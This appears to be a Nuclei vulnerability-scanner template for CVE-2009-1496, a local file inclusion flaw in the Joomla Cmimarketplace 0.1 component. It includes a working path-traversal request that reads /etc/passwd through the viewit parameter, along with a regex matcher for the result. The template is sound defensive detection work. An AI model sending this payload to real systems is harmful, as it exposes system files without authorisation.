44 lines
1.5 KiB
YAML
44 lines
1.5 KiB
YAML
id: CVE-2009-1496
|
|
|
|
info:
|
|
name: Joomla! Cmimarketplace 0.1 - Local File Inclusion
|
|
author: daffainfo
|
|
severity: medium
|
|
description: |
|
|
Joomla! Cmimarketplace 0.1 is susceptible to local file inclusion because com_cmimarketplace allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.
|
|
impact: |
|
|
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
|
|
remediation: |
|
|
Apply the latest patch or upgrade to a newer version of Joomla! Cmimarketplace to mitigate the vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/8367
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2009-1496
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
|
cvss-score: 5
|
|
cve-id: CVE-2009-1496
|
|
cwe-id: CWE-22
|
|
epss-score: 0.00802
|
|
epss-percentile: 0.79755
|
|
cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: joomla
|
|
product: joomla
|
|
tags: cve2009,cve,joomla,lfi,edb
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022019afaece2da644631e56445b78cdc6465e02321ac35c1bc6e7c16fa4ccbe33fc022100fc55a195275796660b8e10e76e806b1ff741dbb19c90c9a4567d304e8a654d5d:922c64590222798bb761d5b6d8e72950 |